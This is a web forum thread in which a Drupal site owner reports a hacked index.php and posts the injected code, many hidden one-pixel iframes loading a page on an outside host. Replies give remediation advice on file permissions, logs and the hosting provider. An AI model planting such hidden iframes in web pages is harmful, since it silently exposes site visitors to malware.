By Turki on
Hello All,
I am running the latest version of drupal which seems to be hacked. I visited my site today and found a blank page with the following error:
Parse error: syntax error, unexpected '<' in /mounted-storage/home48c/sub001/sc12865-DBOR/www/index.php on line 37
So I checked the index.php file and I found the following at the bottom of the files:
So how did that get in there? I didnt put it there?? Any ideas whats going on here?
Comments
the code inserted in my
the code inserted in my index file didnt appear in the first post. lets try again:
<iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe><iframe src="http://webhostnet.org/spl/index.php" width=1 height=1></iframe>---
your index.php file should not be writeable, yes your site has been "persey" hacked remove the code and make your index.php file CHMOD 644, im guessing you have it set at 777 or 755 this would make the file writable.
if your file was already CHMOD 644 check your apache logs to figure out when this was done, and inform your host.
The file is already CHMOD
The file is already CHMOD 644
Guess its time to talk to my host.
-=-
yes it is, that would point to someone who took over your server as the owner and had write access. I've seen this type of thing happen with a security hole in cPanel in the past. find out if your host has uptodate installations. Most certainly alert them to the problem.
My host dosent use cPanel,
My host dosent use cPanel, however I just wrote a support ticket and will see what happens.
Some of the JavaScript from that site decoded
I have no idea what this means, but I went to the URL in the source of the iframe you posted, and it had a single line of script with a bunch of characters mashed together. So I used a script I have for checking what hackers are trying to do to my site, and it turned up the following for part of the line.
If anyone could translate this, that would be appreciated, mostly because I'm curious now.
Dave
encoding
I am told by some Chinese friends that it looks like this is not being displayed with the right encoding - probably originally big5 or simplified Chinese - but gibberish when viewed in a page with the wrong coding, like this one.
Sok